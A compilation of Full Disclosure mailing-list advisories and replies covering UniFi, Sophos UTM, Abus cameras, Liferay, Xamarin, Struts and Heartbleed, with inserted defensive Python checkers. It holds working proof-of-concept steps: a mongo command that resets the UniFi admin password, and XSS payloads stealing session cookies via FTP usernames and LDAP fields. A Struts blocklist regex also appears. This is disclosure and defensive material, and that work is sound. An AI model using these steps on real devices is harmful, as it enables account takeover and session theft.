> Thanks,
> Carlos Silva
> 
> On Fri, Sep 30, 2016 at 10:49 AM, Tim Schughart 
> <t.schugh...@prosec-networks.com> wrote:
> Hello @all,
> 
> together with my colleague we found two uncritical vulnerabilities you'll 
> find below.
> 
> Product: UniFi AP AC Lite
> Vendor: Ubiquiti Networks Inc.
> 
> Internal reference: ? (Bug ID)
> Vulnerability type: Incorrect access control
> Vulnerable version: UniFi 5.2.7; possibly other versions affected (not 
> tested)
> Vulnerable component: Database
> Report confidence: yes
> Solution status: Not fixed by Vendor, the bug is a feature.
> Fixed versions: -
> Researcher credits: Tim Schughart, Immanuel Bär, Khanh Quoc Pham of ProSec 
> Networks
> Solution date: -
> Public disclosure: 2016-09-30
> CVE reference: CVE-2016-7792
> CVSSv3: 8.8 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
> 
> 
> Vulnerability Details:
> You are able to connect to the access point's database because of a broken 
> authentication (OWASP TOP10). So you are able to modify the database and read 
> the data. A possible scenario you'll find in the PoC section.
> 
> Risk:
> An attacker gets access to the database and, e.g., is able to change the 
> admin's password, as you can see in the PoC below.
> 
> PoC:
>  1. Generate SHA512 Hash with e.g.
>  mkpasswd -m sha-512
> 
>  2. Connect via network to database, e.g. :
>  mongo --port 27117 --host target_ip
> 
>  3. Change password via command
>  "db.admin.update({"name":"ProSec"}, {$set : {"x_shadow":
>  
> "$6$Se9i5I7k3hI8d4bk$CqEXRUwk7c7A/62E/HcC4SrMSLOrBdm7wRvwTS4t.nNJA3RYta0RfzJpuREg.qcAHsPGW9Gjwm3krJROXzbCv."}})"
>  4. Login via web interface with new password
> 
> 
> Best regards / Mit freundlichen Grüßen
> 
> 
> Tim Schughart
> CEO / Geschäftsführer
> 
> --
> ProSec Networks e.K.
> Ellingshohl 82
> 56077 Koblenz
> 
> Website: https://www.prosec-networks.com
> E-Mail: t.schugh...@prosec.networks.com
> Mobile: +49 (0)157 7901 5826
> Phone: +49 (0)261 450 930 90
> 
> "This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or 
> LEGALLY PROTECTED information and is intended only for the named 
> recipient(s). Any unauthorized use, dissemination, copying or forwarding is 
> strictly prohibited. If you are not the intended recipient and have received 
> this email communication in error, please notify the sender immediately, 
> delete it and destroy all copies of this E-Mail. VAT ID: DE290654714 legal 
> domicile Koblenz, HRA 21625.“
> 
> "Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS UNTERLIEGENDE 
> und/oder RECHTLICH GESCHÜTZTE Informationen enthalten und ist ausschließlich 
> für den/die genannten Adressaten bestimmt. Jede unbefugte Nutzung, 
> Weitergabe, Vervielfältigung oder Versendung ist strengstens verboten. 
> Sollten Sie nicht der angegebene Adressat sein und diese E-Mail Mitteilung 
> irrtümlich erhalten haben, informieren Sie bitte sofort den Absender, löschen 
> diese E-Mail und vernichten alle Kopien. USt-IdNr.:  DE290654714, Amtsgericht 
> Koblenz, HRA 21625."
> 
> ___
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
> 


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Critical Vulnerability in Ubiquiti UniFi

2016-09-30 Thread Tim Schughart
Hello @all, 

together with my colleague we found two uncritical vulnerabilities you'll find 
below.

Product: UniFi AP AC Lite
Vendor: Ubiquiti Networks Inc. 

Internal reference: ? (Bug ID)
Vulnerability type: Incorrect access control 
Vulnerable version: UniFi 5.2.7; possibly other versions affected (not 
tested)
Vulnerable component: Database
Report confidence: yes
Solution status: Not fixed by Vendor, the bug is a feature. 
Fixed versions: -
Researcher credits: Tim Schughart, Immanuel Bär, Khanh Quoc Pham of ProSec 
Networks
Solution date: - 
Public disclosure: 2016-09-30
CVE reference: CVE-2016-7792
CVSSv3: 8.8 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 


Vulnerability Details:
You are able to connect to the access point's database because of broken 
authentication (OWASP Top 10), so you can read and modify the data. A 
possible scenario is shown in the PoC section. 

Risk:
An attacker gains access to the database and is, for example, able to change the 
admin's password, as shown in the PoC below. 

PoC: 
 1. Generate a SHA-512 crypt hash, e.g.:
 mkpasswd -m sha-512

 2. Connect to the database over the network, e.g.:
 mongo --port 27117 --host target_ip

 3. Change the password with:
 db.admin.update({"name":"ProSec"}, {$set : {"x_shadow": "$6$Se9i5I7k3hI8d4bk$CqEXRUwk7c7A/62E/HcC4SrMSLOrBdm7wRvwTS4t.nNJA3RYta0RfzJpuREg.qcAHsPGW9Gjwm3krJROXzbCv."}})

 4. Log in via the web interface with the new password


Best regards / Mit freundlichen Grüßen 


Tim Schughart 
CEO / Geschäftsführer  

--
ProSec Networks e.K. 
Ellingshohl 82  
56077 Koblenz 

Website: https://www.prosec-networks.com 
E-Mail: t.schugh...@prosec.networks.com 
Mobile: +49 (0)157 7901 5826
Phone: +49 (0)261 450 930 90   

"This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or LEGALLY 
PROTECTED information and is intended only for the named recipient(s). Any 
unauthorized use, dissemination, copying or forwarding is strictly prohibited. 
If you are not the intended recipient and have received this email 
communication in error, please notify the sender immediately, delete it and 
destroy all copies of this E-Mail. VAT ID: DE290654714 legal domicile Koblenz, 
HRA 21625.“

"Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS UNTERLIEGENDE 
und/oder RECHTLICH GESCHÜTZTE Informationen enthalten und ist ausschließlich 
für den/die genannten Adressaten bestimmt. Jede unbefugte Nutzung, Weitergabe, 
Vervielfältigung oder Versendung ist strengstens verboten. Sollten Sie nicht 
der angegebene Adressat sein und diese E-Mail Mitteilung irrtümlich erhalten 
haben, informieren Sie bitte sofort den Absender, löschen diese E-Mail und 
vernichten alle Kopien. USt-IdNr.:  DE290654714, Amtsgericht Koblenz, HRA 
21625."

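Added example (not part of the advisory or of the reply to it): the question raised in the reply, whether the controller's mongod is reachable from the network at all, is settled by looking at what it binds to on the controller host. The script below parses `ss -ltn` output and flags any listener on port 27117 that is not bound to a loopback address. The sample output is constructed, not captured from a real controller; the live check at the bottom expects to run on the controller host itself.

```python
import ipaddress

# Constructed sample of `ss -ltn` output from a controller host; not captured
# from a real UniFi installation. The last line is the exposed case.
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     127.0.0.1:27117      0.0.0.0:*
LISTEN  0       128     0.0.0.0:8443         0.0.0.0:*
LISTEN  0       128     [::]:8080            [::]:*
LISTEN  0       128     *:27117              *:*
"""

MONGO_PORT = 27117  # port the PoC above connects to


def parse_listeners(ss_output):
    """Return (address, port) tuples for every LISTEN line of `ss -ltn` output."""
    listeners = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue
        # Local Address:Port is the 4th column; split on the last colon so
        # bracketed IPv6 literals such as [::]:8080 are handled.
        addr, _, port = fields[3].rpartition(":")
        if not port.isdigit():
            continue
        listeners.append((addr.strip("[]"), int(port)))
    return listeners


def is_loopback(addr):
    """True only for 127.0.0.0/8 and ::1; wildcard binds ('*', 0.0.0.0, ::) are reachable off-host."""
    if addr in ("*", ""):
        return False
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False


def exposed_ports(ss_output, ports=(MONGO_PORT,)):
    """Listeners on the given ports that are not bound to a loopback address."""
    return [(addr, port) for addr, port in parse_listeners(ss_output)
            if port in ports and not is_loopback(addr)]


if __name__ == "__main__":
    import subprocess
    # Live check: run on the controller host, where `ss` is available.
    out = subprocess.run(["ss", "-ltn"], capture_output=True, text=True, check=True).stdout
    for addr, port in exposed_ports(out) or []:
        print(f"port {port} is reachable from the network on {addr}")
```

If the only 27117 listener reported is on 127.0.0.1 or ::1, the PoC above needs a shell on the host first, which is the reply's point; a wildcard or interface-address bind is the configuration the advisory describes.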

[FD] Multiple exposures in Sophos UTM

2016-09-30 Thread Tim Schughart
Hello @all, 

together with my colleague we found two uncritical vulnerabilities you'll find 
below.

Product: Sophos UTM
Vendor: Sophos ltd. 

Internal reference: ? (Bug ID)
Vulnerability type: Information Disclosure
Vulnerable version: 9.405-5, 9.404-5; possibly other versions affected (not 
tested)
Vulnerable component: Frontend
Report confidence: yes
Solution status: Not fixed by Vendor, no further responses from vendor. 
Fixed versions: -
Researcher credits: Tim Schughart & Khanh Quoc Pham of ProSec Networks
Vendor notification: 2016-09-01
Solution date: - 
Public disclosure: 2016-09-30
CVE reference: CVE-2016-7397
CVSSv3: 6.7 AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N

Report timeline:
2016-09-01: Contacted vendor; vendor acknowledged, no further response 
2016-09-12: Contacted vendor again; vendor started to fix 
2016-09-30: Contacted vendor again, because there had been no response to our 
request and to the disclosure date we had announced initially; no response again. 
2016-09-30: Public disclosure. 

Vulnerability Details:
The password is reflected into the DOM and is readable through the "value" 
attribute of the SMTP user settings in the Notifications tab. You have to be 
authenticated to access the configuration tab. 

Risk:
An attacker gains access to the configured mailbox. Because Sophos UTM is a 
multi-user system, this is a problem in bigger company environments with 
split admin rights. The scope is changed, because in bigger 
environments you gain access to the configured mailbox, which results in 
an integrity loss. 

Steps to reproduce:
See vulnerability details.


--


Product: Sophos UTM
Vendor: Sophos ltd. 

Internal reference: ? (Bug ID)
Vulnerability type: Information Disclosure
Vulnerable version: 9.405-5, 9.404-5; possibly other versions affected (not 
tested)
Vulnerable component: Frontend
Report confidence: ?
Solution status: Not fixed by Vendor
Fixed versions: -
Researcher credits: Tim Schughart & Khanh Quoc Pham of ProSec Networks
Vendor notification: 2016-09-01
Solution date: -
Public disclosure: 2016-10-01
CVE reference: CVE-2016-7442 
CVSSv3: 6.7 AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N

Vulnerability Details:
The password is reflected into the DOM and is readable through the "value" 
attribute of the proxy user settings under system settings / scan settings / anti-spam. 
You have to be authenticated to access the configuration tab.

Risk:
An attacker gains access to the configured proxy user. Because Sophos UTM is 
a multi-user system, this is a problem in bigger company environments with 
split admin rights. The scope is changed, because in bigger 
environments you gain access to the configured proxy user, which results 
in a privilege escalation. 

Steps to reproduce:
See vulnerability details. 


Best regards / Mit freundlichen Grüßen 

Tim Schughart 
CEO / Geschäftsführer  

--
ProSec Networks e.K. 
Ellingshohl 82  
56077 Koblenz 

Website: https://www.prosec-networks.com 
E-Mail: t.schugh...@prosec.networks.com 
Mobile: +49 (0)157 7901 5826
Phone: +49 (0)261 450 930 90   

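Added example, not code from the advisory or from Sophos: a small check for the class of bug described in both reports above, a stored credential echoed back into the page through an input's value attribute. It parses a page with the standard-library HTMLParser and reports password-type inputs, and inputs whose name suggests a secret, that arrive with a non-empty value. Only the length of the value is recorded, so the scan output does not itself leak the secret. The settings-page HTML is constructed for the example, not taken from the UTM interface.

```python
from html.parser import HTMLParser

# Constructed settings-page fragment standing in for a UI that echoes a stored
# credential back into the DOM; it is not taken from Sophos UTM.
SAMPLE_SETTINGS_PAGE = """
<form id="notifications">
  <input type="text" name="smtp_user" value="notify@example.com">
  <input type="password" name="smtp_pass" value="S3cretPassw0rd">
  <input type="password" name="smtp_pass_confirm" value="">
  <input type="hidden" name="api_token" value="tok_abc123">
  <input type="text" name="smtp_host" value="mail.example.com" />
</form>
"""

SECRET_TYPES = {"password"}
SECRET_NAME_HINTS = ("pass", "secret", "token", "key")  # heuristic, tune per application


class PrefilledSecretFinder(HTMLParser):
    """Collect <input> elements that ship a secret back to the browser in their value attribute."""

    def __init__(self):
        super().__init__()
        self.findings = []  # (name, type, value length); the value itself is never stored

    def handle_starttag(self, tag, attrs):
        # HTMLParser routes self-closing <input ... /> here as well.
        if tag != "input":
            return
        a = dict(attrs)
        name = a.get("name") or ""
        input_type = (a.get("type") or "text").lower()
        value = a.get("value") or ""
        if not value:
            return  # an empty value attribute discloses nothing
        looks_secret = (input_type in SECRET_TYPES
                        or any(hint in name.lower() for hint in SECRET_NAME_HINTS))
        if looks_secret:
            self.findings.append((name, input_type, len(value)))


def find_prefilled_secrets(page_html):
    """Return [(name, type, value_length), ...] for inputs that leak a stored secret."""
    parser = PrefilledSecretFinder()
    parser.feed(page_html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for name, input_type, length in find_prefilled_secrets(SAMPLE_SETTINGS_PAGE):
        print(f"{name} (type={input_type}) is prefilled with a {length}-character value")
```

Run it against a saved copy of each authenticated configuration page (curl with the session cookie, or "save page" from the browser). The correct server-side behaviour for the flagged fields is to render an empty value, or a placeholder that the form handler treats as "unchanged", and never the stored secret.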

[FD] Persistent XSS in Abus Security Center - CVSS 8.0

2016-09-29 Thread Tim Schughart
Hi@all, 

Product: Abus Security Cams 
Vendor: Abus Group  

Internal reference: - 
Vulnerability type: Cross Site Scripting 
Vulnerable version: 0101a; possibly other versions affected (not tested)
Vulnerable component: FTP
Report confidence: Confirmed
Solution status: Not fixed by Vendor, will not patch the vuln. 
Fixed versions: -
Researcher credits: Tim Schughart & Khanh Quoc Pham of ProSec Networks
Vendor notification: 2016-09-21
Solution date: 
Public disclosure: 2016-09-29
CVE reference: 
CVSSv3: 8.0 AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 
<https://nvd.nist.gov/cvss/v3-calculator?vector=AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H>

Vulnerability Details:
The username entered at FTP login is written to the log, which is rendered in 
the web interface without input validation. This results in a successful, 
persistent XSS.

Risk:
Through this you are able to obtain, e.g., the session cookies of the camera's 
administrator, and thereby get full access, persistently. 

PoC: 
FTP Username: alert(document.cookie) 
FTP Pass: any 

Browse to log and watch the popup :) 


Best regards / Mit freundlichen Grüßen 

Tim Schughart 
CEO / Geschäftsführer  

--
ProSec Networks e.K.
Ellingshohl 82
56076 Koblenz 

Website: https://www.prosec-networks.com <http://www.prosec-networks.com/> 
E-Mail: t.schugh...@prosec.networks.com <mailto:i...@prosec.networks.com> 
Mobile: +49 (0)157 7901 5826
Phone: +49 (0)261 450 930 90


[FD] Sicherheitslücke - Liferay Portal Enterprise Edition

2015-10-05 Thread Tim Schughart
Hey guys,

during a penetration test I found a previously unknown persistent XSS in the Liferay 
Portal backend.

##
#General Information#
##


Manufacturer description:
Liferay Portal is an enterprise web platform for the development of business 
solutions, which provides quick results and long-term value.



#Details#

Product: Liferay Portal Enterprise Edition (6.2 EE SP13)
Affected versions: all <= 6.2 EE SP13
Type of attack: persistent cross-site scripting
Proof of concept: yes, 6.2 EE SP13
Authentication required: yes
Reason: missing input validation
Impact: injection of malicious JavaScript code

##
#PoC#
##
You have to be authenticated in the administrator backend.
From there, browse to the control panel:
- In Configuration, click Portal Settings
- Select Authentication
- Select LDAP
- Select Add Server
- Enter the following code in the server name field

Value for the LDAP server name field:
Name_of_ldap_serveralert("XSS")

The script stays in the configuration page persistently until the LDAP 
server is deleted from the database again.

Best regards / Mit freundlichen Grüßen

Tim Schughart
CEO | IT Security specialist



ProSec Networks
Website: http://www.prosec-networks.com <http://www.prosec-networks.com/>
E-Mail: i...@prosec.networks.com <mailto:i...@prosec.networks.com>
Phone: +49(0) 2621 9469 252


Re: [FD] Xamarin for Android 5.1 DLL Hijack Vulnerability

2015-05-19 Thread Tim
Isn't this the public bug tracker?

https://bugzilla.xamarin.com/describecomponents.cgi?product=Android

Though, correct that case id doesn't map to anything there.

-Tim Strazzere

On Tue, May 19, 2015 at 2:32 PM, ValdikSS i...@valdikss.org.ru wrote:

  They don't have public bugtracker. Case ID is 140518.



Re: [FD] Xamarin for Android 5.1 DLL Hijack Vulnerability

2015-05-19 Thread Tim
Thanks for posting this to FD, these didn't even include it in their
release notes;

http://developer.xamarin.com/releases/android/xamarin.android_5/xamarin.android_5.1/

Was there a bug reported in bugzilla to link back to?

-Tim Strazzere

On Tue, May 19, 2015 at 6:49 AM, ValdikSS i...@valdikss.org.ru wrote:



 Xamarin for Android prior to version 5.1 allows replacing internal DLL
 files inside the APK with files on the SD card, which is not secure
 storage.
 A malicious application without any special permissions could drop
 backdoored DLL files into

 /storage/sdcard0/Android/data/app_id/files/.__override__/

 and the victim application would use the files from the SD card.
 Not just the main application library could be hijacked, but also
 Xamarin's System.dll and Mono.Android.dll, which are shipped in all Xamarin
 for Android
 applications.

 Developers should rebuild their applications using Xamarin for Android 5.1
 or newer in release mode.

 This vulnerability was found by accident, which allowed me to eat for free
 for a month.

 Timeline:
 03.04.2015 Vulnerability is found
 07.04.2015 Message sent to Xamarin
 08.04.2015 Xamarin acknowledged the vulnerability
 29.04.2015 Fixed stable version released

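Added example, not from the advisory quoted above and not Xamarin's code: a check for the planted-DLL condition it describes. Given the root of a device's external storage (for instance a copy pulled with `adb pull /sdcard/Android/data`), it walks Android/data/<package>/files/.__override__/ and lists any DLLs found there, which on a build older than Xamarin for Android 5.1 would shadow the copies inside the APK. The directory tree it runs against here is constructed in a temporary directory and the package names are made up.

```python
import tempfile
from pathlib import Path

OVERRIDE_DIR = ".__override__"  # directory name from the advisory


def find_override_dlls(external_storage_root):
    """Return (package, dll_relative_path) pairs for DLLs planted under
    <root>/Android/data/<package>/files/.__override__/ ."""
    data_root = Path(external_storage_root) / "Android" / "data"
    hits = []
    if not data_root.is_dir():
        return hits
    for pkg_dir in sorted(data_root.iterdir()):
        override = pkg_dir / "files" / OVERRIDE_DIR
        if not override.is_dir():
            continue
        # rglob: a planted assembly may sit in a sub-directory of the override dir
        for dll in sorted(override.rglob("*.dll")):
            hits.append((pkg_dir.name, str(dll.relative_to(override))))
    return hits


def build_sample_tree():
    """Constructed layout mimicking an SD card with one planted override; returns the temp root.
    Package names are invented for the example."""
    root = tempfile.mkdtemp(prefix="sdcard_")
    planted = Path(root, "Android", "data", "com.example.victim", "files", OVERRIDE_DIR)
    planted.mkdir(parents=True)
    (planted / "Mono.Android.dll").write_bytes(b"MZ")  # would shadow the APK's copy
    (planted / "System.dll").write_bytes(b"MZ")
    clean = Path(root, "Android", "data", "com.example.clean", "files")
    clean.mkdir(parents=True)
    (clean / "cache.bin").write_bytes(b"\x00")  # ordinary app data, not reported
    return root


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    for package, dll in find_override_dlls(root):
        print(f"{package}: planted {dll}")
```

Any hit is worth treating as an incident on a device that still runs a pre-5.1 build of the named package; on a rebuilt app the directory is simply inert, but it still shows that something wrote there.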


Re: [FD] [ANN] Struts 2 up to 2.3.16.1: Zero-Day Exploit Mitigation (security | critical)

2014-04-25 Thread Tim

Also, I'm a tad confused by the regex you have as a stop-gap.  For the
readers' convenience:

(.*\.|^|.*|\[('|))(c|C)lass(\.|('|)]|\[).*,^dojo\..*,^struts\..*,^session\..*,^request\..*,^application\..*,^servlet(Request|Response)\..*,^parameters\..*,^action:.*,^method:.*


If your regex evaluation is case-sensitive, then clearly you need to
check for class and Class, since OGNL converts foo to getFoo,
and would likely also convert Foo to getFoo.  But if the blacklist
is case sensitive, then don't you also need to check for
^Request..., ^Session..., ^Struts..., and so on?  Or is it
actually case insensitive and you're just being unnecessarily careful
with class?

Also: Thought about unicode lately?

tim


PS- yes, I'm too lazy to actually look at the Struts code right now.



On Fri, Apr 25, 2014 at 09:52:23AM -0700, Tim wrote:
 
 
 So I have to say, I feel like the Struts team is kind of... failing.
 Here are my gripes:
 
 A) I questioned the last bug fix in the thread here [1], where we
were all reassured that it was just ClassLoader manipulation, not 
RCE.  Clearly that's not true.
 
 B) The fix for the last CVE was that crappy ^class\. filter, which
I pointed out was insufficient.  The Struts team quickly fixed
that, but never bothered to update the workaround section in the 
last advisory to the less-terrible .*\.class\..* regex (or whatever
it was).  So if developers just implemented the work around from
the advisory, they were obviously not protected.  (In hindsight,
 they never were protected even with the better regex, but it was just
 irresponsible not to make the second regex more public.)
 
 C) The Struts team is playing whack-a-mole.  Instead of fixing the
root issue, they are just adding one blacklist regex after another,
hoping no one figures out yet another way around it.
 
 
 I urge you to take OGNL and *throw it out*.  Replace it with something
 that allows only a white list of properties to be set, based on what
 the application defines as relevant.  Until then, I'm recommending to
 my clients that they avoid Struts like the plague.
 
 tim
 
 1. http://seclists.org/fulldisclosure/2014/Mar/53
 
 
 
 On Thu, Apr 24, 2014 at 05:37:13PM +0200, Rene Gielen wrote:
  In Struts 2.3.16.1, an issue with ClassLoader manipulation via request
  parameters was supposed to be resolved. Unfortunately, the correction
  wasn't sufficient.
  
  A security fix release fully addressing this issue is in preparation and
  will be released as soon as possible.
  
  Once the release is available, all Struts 2 users are strongly
  recommended to update their installations.
  
  * Until the release is available, all Struts 2 users are strongly
  recommended to apply the mitigation described in [1] *
  
  Please follow the Apache Struts announcement channels [2][3][4][5] to
  stay updated regarding the upcoming security release. Most likely the
  release will be available within the next 72 hours. Please prepare for
  upgrading all Struts 2 based production systems to the new release
  version once available.
  
  - The Apache Struts Team.
  
  [1] http://struts.apache.org/announce.html#a20140424
  [2] http://struts.apache.org/mail.html
  [3] http://struts.apache.org/announce.html
  [4] https://plus.google.com/+ApacheStruts/posts
  [5] https://twitter.com/TheApacheStruts
  
  -- 
  René Gielen
  http://twitter.com/rgielen
  


Re: [FD] Audit: don't only focus on heartbleed issue

2014-04-16 Thread Tim

 and the others need a MITM attack which is not *that* easy
 as connect to a server and send a heartbleed-packet without
 anything in the logs of the attacked server

I agree with you here.  It seems that Lucky13 requires much more
access and is much harder to pull off in practice.  Unless there's
new techniques out there that I haven't kept up on

 frankly outside a public hotspot / untrusted network nobody
 but the NSA and other agencies are able to really MITM

This I think is a misconception, or at least overstated.  Anyone on
the same network as you can MitM you.  Anyone on the same network as
the remote end point can MitM you.  For some reason in this day and
age people have all forgotten about ARP poisoning, netbios name
poisoning, DHCP hijacking, and a whole host of other ways to redirect
traffic.  And apparently random people halfway around the world can
hijack your DNS resolver[1].

The dividing line between internal network and the Internet is
becoming fuzzier every day.  It is getting easier to get inside and
yet everyone still seems to run an unsegmented internal trusted
network.

tim


1. 
http://arstechnica.com/information-technology/2014/03/google-dns-briefly-hijacked-to-venezuela/



Re: [FD] heartbleed OpenSSL bug CVE-2014-0160

2014-04-08 Thread Tim Schütt
Nope, it also works on other protocols like IMAPS.


Am 08.04.2014 15:30, schrieb Chris Schmidt:
 The bug is in the TLS implementation in OpenSSL, you will only see it on 
 https 

 Sent from my iPhone

 On Apr 8, 2014, at 4:43 AM, Nik Mitev n...@mitev.net wrote:

 I used the tool Kirils linked (http://possible.lv/tools/hb/) and my
 unpatched servers running a Tor node or an OpenVPN server returned the
 correct (old) version of openssl but "not vulnerable".
 Is it the bug or the tool that seems to be limited to https, I wonder?

 Patched now so can't test with this tool...

 -Original Message-
 From: Fraser Scott fraser.sc...@gmail.com
 To: fulldisclosure@seclists.org
 Subject: Re: [FD] heartbleed OpenSSL bug CVE-2014-0160
 Date: Tue, 8 Apr 2014 10:24:02 +0100

 This seems to be the best test so far:

 http://s3.jspenguin.org/ssltest.py

 Other tests false-positive on patched versions from what I can see.


 On 8 April 2014 01:10, Kirils Solovjovs kirils.solovj...@kirils.com wrote:

 We are doomed.

 Description: http://www.openssl.org/news/vulnerabilities.html
 Article dedicated to the bug: http://heartbleed.com/
 Tool to check if TLS heartbeat extension is supported:
 http://possible.lv/tools/hb/

 A missing bounds check in the handling of the TLS heartbeat extension
 can be used to reveal up to 64kB of memory to a connected client or server.

 1.0.1[ abcdef] affected.


 P.S. Happy Monday!
